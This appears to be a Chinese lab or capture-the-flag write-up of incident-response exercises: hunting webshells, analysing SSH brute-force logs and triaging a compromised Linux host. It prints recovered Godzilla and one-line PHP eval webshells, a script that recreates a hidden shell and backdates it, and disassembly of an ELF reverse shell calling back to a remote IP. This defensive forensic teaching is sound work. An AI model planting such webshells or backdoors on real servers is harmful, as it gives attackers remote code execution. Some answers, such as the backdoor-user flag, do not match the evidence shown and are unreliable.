第一章 应急响应-webshell查杀
查杀方法1:d盾查杀
查杀方法2:grep -nr "eval" .`
一,黑客webshell里面的flag flag
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
$ root@ip-10-0-10-1:/var/www/html/include# cat gz.php
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
二,黑客使用的什么工具的shell github地址的md5 flag
根据上述代码,查找特征值发现是哥斯拉
flag{39392de3218c333f794befef07ac9257}
三,黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
d盾查杀中发现一个^.的后门文件
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
$ root@ip-10-0-10-1:/var/www/html/include/Db# cat .Mysqli.php
flag{aebac0e58cd6c5fad1695ee4d1ac1919}
四,黑客免杀马完整路径 md5 flag
进行日志审计
/1.php
/favicon.ico
/adminer.php
/adminer.php?file=default.css&version=4.7.2
/adminer.php?file=functions.js&version=4.7.2
/adminer.php?file=favicon.ico&version=4.7.2
/adminer.php?script=version
/adminer.php
/adminer.php?username=root
/adminer.php
/adminer.php?username=root
/adminer.php?file=jush.js&version=4.7.2
/adminer.php?username=root&db=mysql
/adminer.php?file=jush.js&version=4.7.2
/adminer.php?username=root&db=mysql&script=db
/
/install.php
/
/install.php
/
/install.php
/admin
/admin/
/admin/admin.php?action=frame&ctrl=login
/admin/template/images/common.css
/
/template/taoCMS/images/style.css
/template/taoCMS/images/tao.js
/template/taoCMS/images/dot.gif
/template/taoCMS/images/tip.gif
/template/taoCMS/images/logo.gif
//favicon.ico
/admin/admin.php
/admin/admin.php?action=frame&ctrl=iframes
/admin/admin.php?action=frame&ctrl=top
/admin/admin.php?action=frame&ctrl=menu
/admin/template/images/common.js
/admin/admin.php?action=frame&ctrl=main
/admin/template/images/mainnavbg.gif
/admin/admin.php?action=frame&ctrl=iframes
/admin/admin.php?action=frame&ctrl=menu
/admin/admin.php?action=frame&ctrl=top
/admin/admin.php?action=frame&ctrl=main
/admin/admin.php?action=frame&ctrl=iframes
/admin/admin.php?action=frame&ctrl=top
/admin/admin.php?action=frame&ctrl=menu
/admin/admin.php?action=frame&ctrl=main
/admin/admin.php?action=sql&ctrl=display
/admin/admin.php
/admin/admin.php?action=sql&ctrl=display
/admin/admin.php
/admin/admin.php?action=sql&ctrl=display
/admin/admin.php?action=frame&ctrl=iframes
/admin/admin.php?action=frame&ctrl=top
/admin/admin.php?action=frame&ctrl=menu
/admin/admin.php?action=frame&ctrl=main
/
/template/taoCMS/images/tao.js
/install.php
/
/?id=1
/template/taoCMS/images/addthis.gif
/api.php?action=comment&ctrl=code
/?id=1
/api.php?action=comment&ctrl=code
/?cat=1
/
/?cat=1
/
/?id=1
/api.php?action=comment&ctrl=code
/admin/admin.php?action=comment&ctrl=lists
/admin/admin.php?action=link&ctrl=lists
/admin/admin.php?action=file&ctrl=lists
/admin/template/images/sub_arrow.gif
/admin/admin.php?path=&action=file&ctrl=create&isdir=0&name=&fbtn=%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6
/admin/admin.php?action=comment&ctrl=lists
/admin/admin.php?action=link&ctrl=lists
/admin/admin.php?action=file&ctrl=lists
/admin/admin.php?action=admin&ctrl=lists
/admin/admin.php?action=file&ctrl=lists
/admin/admin.php?path=&action=file&ctrl=create&isdir=0&name=shell.php&fbtn=%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6
/admin/admin.php?action=file&ctrl=lists&path=.
/admin/admin.php?action=file&ctrl=edit&path=./shell.php
/admin/template/images/tinyeditor.js
/admin/admin.php
/admin/admin.php?action=file&ctrl=lists
/shell.php
/favicon.ico
/admin/admin.php?action=file&ctrl=edit&path=shell.php
/admin/template/images/tinyeditor.js
/admin/admin.php
/admin/admin.php?action=file&ctrl=lists
/shell.php
/admin/admin.php?action=file&ctrl=edit&path=shell.php
/admin/template/images/tinyeditor.js
/admin/admin.php
/shell.php
/admin/admin.php?action=file&ctrl=lists
/shell.php
/
/data/tplcache/top.php
/data/tplcache/top.php?1=phpinfo();
/shell.php
/data/tplcache/top.php?1=phpinfo();
/shell.php
/favicon.ico
/shell.php
/wap/index.php?1=phpinfo();
/wap/template/images/mobile.css
/wap/template/images/time.gif
/wap/template/images/logo.gif
/wap/index.php?1=phpinfo();
/shell.php
/wap/index.php?1=phpinfo();
/shell.php
/wap/top.php?1=phpinfo();
/shell.php
/wap/top.php?fuc=ERsDHgEUC1hI&func2=ser
/wap/top.php?fuc=ERsDHgEUC1hI&func2=sert
/shell.php
$ cat access.log|awk '{print $7}'|uniq
发现top.php
flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}
第一章 应急响应-Linux日志分析
一,有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割 小到大排序 例如flag
192.168.200.32,192.168.200.2,192.168.200.31
$ cat /var/log/auth.log*|grep -a root|grep -a fail|awk -F ' ' '{print $14}'|uniq|awk -F '=' '{print $2}'|paste -sd, -
flag{192.168.200.2,192.168.200.31,192.168.200.32}
二,ssh爆破成功登陆的IP是多少,如果有多个使用","分割
Jun 6 07:04:06 ip-10-0-10-3 sshd[614]: Accepted password for root from 122.239.18.143 port 62737 ssh2
Aug 1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2
Aug 1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2
$ cat /var/log/auth.log*|grep -a "Accept"
flag{192.168.200.2}
三,爆破用户名字典是什么?如果有多个使用","分割
test1,test2,test3,user,hello,from
$ cat auth.log.1|grep -a sshd|grep Fail|grep -a 'invalid user'|awk -F ' ' '{print $11}'|uniq|paste -sd, -
flag{user,hello,root,test3,test2,test1}
四,成功登录 root 用户的 ip 一共爆破了多少次
4
$ cat auth.log*|grep -a "sshd"|grep "Failed password for root"|grep -a "192.168.200.2" |wc -l
flag{4}
五,黑客登陆主机后新建了一个后门用户,用户名是多少
Jun 6 07:04:06 ip-10-0-10-3 sshd[614]: Accepted password for root from 122.239.18.143 port 62737 ssh2
Aug 1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2
Aug 1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2
$ cat /var/log/auth.log*|grep -a "Accept"
flag{4}
应急响应- Linux入侵排查
一,web目录存在木马,请找到木马的密码提交
<?php eval($_POST[1]);?>
$ cat 1.php
flag{1}
二,服务器疑似存在不死马,请找到不死马的密码提交
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
$ cat .shell.php
flag{hello}
三,不死马是通过哪个文件生成的,请提交文件名
./index.php:$file = '/var/www/html/.shell.php';
./index.php:system('touch -m -d "2021-01-01 00:00:01" .shell.php');
$ grep -r 'shell' .
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
$ cat index.php
flag{index.php}
四,黑客留下了木马文件,请找出黑客的服务器ip提交
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 554/mysqld
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 506/sshd
tcp 0 1 10.0.10.6:45816 10.11.55.21:3333 SYN_SENT 1241/./shell(1).elf
tcp 0 0 10.0.10.6:22 122.239.18.143:9274 ESTABLISHED 753/sshd: root@pts/
tcp 0 340 10.0.10.6:22 122.239.18.143:30744 ESTABLISHED 1227/sshd: root@pts
tcp6 0 0 :::80 :::* LISTEN 511/apache2
tcp6 0 0 :::22 :::* LISTEN 506/sshd
$ ./'shell(1).elf'
$ netstat -antlp
flag{10.11.55.21}
五,黑客留下了木马文件,请找出黑客服务器开启的监端口提交
flag{3333}
补充:
木马文件分析,常规都是重新运行一次木马程序或者在线查杀,虽然确实快,但是尝试逆向分析
LOAD:08048054 ; void start()
LOAD:08048054 public start
LOAD:08048054 start proc near ; DATA XREF: LOAD:08048018↑o
LOAD:08048054 push 0Ah
LOAD:08048056 pop esi
LOAD:08048057
LOAD:08048057 loc_8048057: ; CODE XREF: start+44↓j
LOAD:08048057 xor ebx, ebx
LOAD:08048059 mul ebx
LOAD:0804805B push ebx
LOAD:0804805C inc ebx ; call
LOAD:0804805D push ebx
LOAD:0804805E push 2
LOAD:08048060 mov al, 66h ; 'f' # socketcall 的调用号
LOAD:08048062 mov ecx, esp ; args
LOAD:08048064 int 80h ; LINUX -
LOAD:08048066 xchg eax, edi
LOAD:08048067 pop ebx
LOAD:08048068 push 15370B0Ah
LOAD:0804806D push 50D0002h # 对应edi参数
LOAD:08048072 mov ecx, esp
LOAD:08048074 push 66h ; 'f'
LOAD:08048076 pop eax
LOAD:08048077 push eax
LOAD:08048078 push ecx
LOAD:08048079 push edi
LOAD:0804807A mov ecx, esp
LOAD:0804807C inc ebx
LOAD:0804807D int 80h ; LINUX -
LOAD:0804807F test eax, eax
关键代码
| 栈帧 | ||
|---|---|---|
| edi | ||
| 50D0002h | ecx | |
| 66h | ||
| 50D0002h | ecx | |
| 15370B0Ah |
程序是小端序,处理后将十六进制转为十进制
In [16]: [0x0A,0x0B,0x37,0x15]
Out[16]: [10, 11, 55, 21]
\x00截断
In [22]: 0xd05
Out[22]: 3333
